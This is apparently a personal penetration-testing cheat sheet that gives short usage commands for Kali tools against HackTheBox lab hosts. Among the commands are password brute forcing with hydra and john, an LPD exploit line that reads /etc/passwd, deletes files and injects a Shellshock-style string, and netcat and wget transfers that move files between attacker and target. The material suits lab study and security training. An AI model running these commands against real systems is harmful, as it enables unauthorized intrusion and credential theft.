Hacking Tools

descriptions of tools that may or may not be default in Kali

more at apt-secure.ca

Coffee Treat!

adb (android debug tool)


#adb connect <IP>:5555

#adb shell

apktool

tool for reverse engineering android apk files

#apktool d -f -r filename.apk

base64 decode

This is how you translate base64 to readable

#echo "<base64 string>"== | base64 --decode

creating base64

#echo "string" | base64


BurpSuite

verbose details here link

DIRB

Web Content Scanner looks for existing (and/or hidden) web objects. Primary function is launching a dictionary based attack against a web server and analyzing the response

Usage: #dirb http://zyz.htb -r -z 10

Dirbuster

GUI for Dirb. Very slick. Especially useful for

Usage: Open dirbuster application

-set number of threads

-set target including http:// or https://

-set wordlist

-set file extension

davtest

tool that tests uploading files to a webdav vulnerable webserver

Usage: #davtest -url http://<ip>

evil-winrm

windows remote managment shell

  • #gem install evil-winrm

  • #evil-winrm -i <IP> -u <username> -p '<password>'

    • available commands when successfull

    • upload/download/services/menu

use evil-winrm with acquired certificate and private key

  • #evil-winrm -i <IP> -S -c cert.crt -k priv.key -p -u

    • you will have to enter password for key(likely you have identified it or made your own)


fcrackzip

a free/Fast zip password cracker

Usage: #fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <filename>.zip

-u = unzip

-D = Dictionary

-p = password string

finger-enum-user.pl

enumerating finger service

Usage: #./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76

getcap

Examine file capabilities. Displays the name and capabilities of each specified file

Usage: #getcap -r /

usage: #getcap -r / 2>/dev/null

gobuster

similar to DIRB, a directory brute forcer

  • you will need to install it

    • #apt-get install gobuster

usage:

"common.txt" at the location you see here was a special download, you can use whatever wordlist you want.

hydra

brute forcing tool

basic usage

  • #hydra -l <username> -P </usr/share/wordlists/rockyou.txt> <IP> -t 4 <service>

Brute force login on website

#hydra -s -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&:invalid"

impacket:

Installation:

#sudo apt-get install python3-pip

#sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Navigate to /opt/impacket

#sudo python3 ./setup.py install

John the Ripper

Basic usage

  • #john --wordlist=/share/wordlists/rockyou.txt <file_name>

pfx get hash value

  • #pfx2john file.pfx > [output_file_name]

    • then go back to basic JTR usage and crack the hash


kubeletctl

Kubeletctl is a command line tool that implement kubelet's API.

typically port 10250

can discover through https://<IP>:10250

github repo

another good resource

installation:

#wget https://github.com/cyberark/kubeletctl/releases/download/v1.7/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

check pods

  • #kubeletctl pods -s <IP>

check running pods

  • #kubeletctl runningpods -s <IP>

ldapsearch

it is a ldap search tool (great resource)

check for null credentials

  • #ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

lpdprint.py

github

Line Print Daemon(LPD) runs on port 515/TCP. It is possible to send files, get files and even navigate the OS

check for null credentials

  • #lpdprint.py hostname filename

  • #lpdtest.py hostname get /etc/passwd

  • #lpdtest.py hostname put ../../etc/passwd

  • #lpdtest.py hostname rm /some/file/on/printer

  • #lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'

  • #lpdtest.py hostname mail lpdtest@mailhost.local

netcat

swiss army knife of the internet

basic file transfer

receiver (works with images/zips/etc.)

  • #nc -nlvp 4444 > file.txt

sender

  • #nc <receiver_IP> 4444 < stuff_you_want_to_send.txt

nmblookup

NetBIOS over TCP/IP client used to lookup NetBIOS names


  • #nmblookup -A <IP>


nuclei

Nuclei is a vulnerability scanning tool developed by projectdiscovery that helps find security issues automatically based on simple YAML-based templates. This tool is highly customizable and helps in identifying vulnerabilities by scanning numerous protocols such as HTTP, DNS, TCP etc.

INITIAL SETUP

  • #apt-get install nuclei

  • #nuclei -u http://<IP> 130


openssl

cryptography toolkit implementing ssl v2/v3 and TLS v1 network protocols and related crypto standards (reference)

(see also on this page ssh2john)

Extract private key from pfx file

  • #openssl pkcs12 -in [yourfile.pfx] -nocerts -out [priv.key]

Extract the certificate

  • #openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [cert.crt]

Decrypt private key

  • #openssl rsa -in [drlive.key] -out [decrypt_priv.key]

Python Webserver

An amazingly quick way to launch a web server so you can transfer files to the target fast!

Run the below command from the "attack" machine. Launch from the directory that contains the file you are wanting. (linpeas.sh, winpeas.sh etc.)

  • #python3 -m http.server 5050

Extract the certificate

  • #wget http://<attack_ip>:5050/linpeas.sh

pureFTPd

Used for transferring data between kali and target

INITIAL SETUP

On Kali

  • #apt-get install pure-ftpd

create ftp user

  • #useradd -g ftpgroup -d /dev/null -s /etc ftpuser

  • #pure-pw useradd jonny -u ftpuser -d /ftphome

  • #pure-pw mkdb

  • #cd /etc/pure-ftpd/auth/

  • #ln -S ../conf/PureDB 60pdb

inside /etc/pure-ftpd/auth

/etc/pure-ftpd/ > #mkdir -p /ftphome

  • #chown -R ftpuser:ftpgroup /ftphome/

  • #systemctl restart pure-ftpd

Check Status

#systemctl status pure-ftpd

USAGE

From target

#ftp <kali IP>

login and download


rpcinfo

typically the service rpcbind is found on port 111

tool makes an RPC call to an RPC server and reports what it finds

basic usage

#rpcinfo <IP>


RSACTFTOOL

download

cracking weak rsa with provided .pub key

#RsaCtfTool.py --publickey <key.pub> --uncipherfile <flag.enc>


rpclient

typically the service rpcbind is found on port 111

tool makes an RPC call to an RPC server and reports what it finds

basic usage-->check for Null Sessions

#rpcclient -U "" -N <IP>


SecLists

this is a user made archive of a TON of scripts and various tools. It's insane

download like so.

#wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip

#unzip SecList.zip

#rm -f SecList.zip


sublist3r

tool designed to enumerate subdomains of websites using OSINT

download like so.

#sublist3r -d domain.com


sherlock

Tool for enumerating social media for user names

You need to install it

Usage: #sherlock <username>

(it returns a lot!)

SimpleHTTPServer (Python)

Used for file transfers between attacker and target. Typically there is something on the target you want to plant

Usage: Attacker Machine: #python -w SimpleHTTPServer <port #>

Usage: Target: #wget http://<attackerIP>:<port>/<desired_file>

ssh2john

you have acquired a .rsa file. You need to convert this file to a hash

  • #ssh2john <filename that is rsa> > hash_output

  • #john --wordlist=/usr/share/wordlists/rockyou.txt hash_output

steghide

basic embedding:

  • #steghide embed -ef secretphrase.txt -cf image.jpeg

basic extraction:

  • #steghide extract -sf image.jpeg

    • enter password

    • output saved "pass.txt"

swaks

swiss army knife for smtp. Main site here

script located here


tcpdump

dumps network traffic. used for analyzing traffic.

power usage link

wafw00f

Identity and fingerprint Web Application Firewall products

sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions. If that is not successful, it sends a number of HTTP requests and uses simple logic to deduce which WAF it is

basic usage:

  • #wafw00f http://<IP>

wpscan

scanner used for gathering information(vulns) on wordpress sites

basic usage

#wpscan --url htt://backdoor.htb

enumerate users

#wpscan --url http://backdoor.htb --enumerate u

deeper scan

#wpscan --url http://<IP> -e ap,t,tt,u

      • ap = all plugins

      • t= themes

      • tt=timthumbs

      • u=users

Brute Force Plugin discovery

#wpscan --url http:/backdoor.htb --plugins-detection aggressive -e ap



zipinfo

Gives you the properties of the zip file

basic usage:

  • #zipinfo -v <filename>.zip